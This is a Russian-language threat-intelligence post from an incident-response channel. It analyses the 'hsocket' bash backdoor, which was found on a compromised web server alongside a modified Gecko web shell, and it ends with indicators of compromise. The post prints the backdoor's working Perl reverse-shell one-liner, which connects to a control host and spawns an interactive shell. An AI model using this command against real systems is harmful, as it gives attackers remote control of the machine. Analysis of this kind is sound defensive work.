TGViewer
ESCalator ESCalator @ptescalator · 8.11K subscribers
Post #775 2.55K
Он вам не gsocket 😑

В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket).

После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.

1️⃣ hsocket — бэкдор, имеющий следующий функционал:

• запуск интерактивной командной оболочки

• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)

• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)

• защита файлов от удаления

• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:

perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};"


• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)

2️⃣ hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.

3️⃣ .hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.

В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО.

Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:

// Fungsi untuk tampilan halaman login
$Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari";


Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:

//------------------GECKO SHELL, RECODED BY AYANA--------------------//
<!-- Gecko Folder File Manager -->


IoC:

hsocket.io
/tmp/hs-data/


#ir #dfir #detect #ioc #malware
@ptescalator
  • 🔥 25
  • ❤ 9
  • 👍 9
  • 💯 1
More from @ptescalator
  1. Sep 18, 2026Post #781
  2. Sep 18, 2026.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом т…
  3. Sep 16, 2026TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптогр…
  4. Sep 15, 2026Post #778
  5. Sep 10, 2026Post #777
  6. Sep 9, 2026Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Techn…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →